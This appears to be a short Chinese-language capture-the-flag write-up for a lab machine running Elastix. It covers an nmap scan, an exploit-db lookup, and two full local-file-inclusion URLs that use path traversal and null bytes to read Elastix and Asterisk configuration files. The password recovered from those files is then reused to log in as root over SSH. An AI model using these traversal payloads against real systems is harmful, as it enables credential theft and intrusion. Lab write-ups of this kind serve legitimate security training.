1、nmap扫描
2、80端口探测 LFI 账户密码
很多端口,看到ssh就要想到登录。再看看80,想到打开网页看看
打开是elastix
网上搜搜相关漏洞
很快在db里搜到
https://www.exploit-db.com/exploits/37637
主要就是这个,以后看到elastix,都可以用如下这俩试试。
ctrl+u
整理前端码
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00
都可以,发现密码 都是 jEhd…那个。没看到什么用户,倒是写了 管理员 admin,似乎就是最高等级的账户,可能为80的admin登录密码,也可能是ssh的root登录密码。
3、 ssh登录
直接试试ssh root,毕竟第一步我们发现开了ssh登录,也说了看到ssh就要想到登录
成功。这台靶机很简单。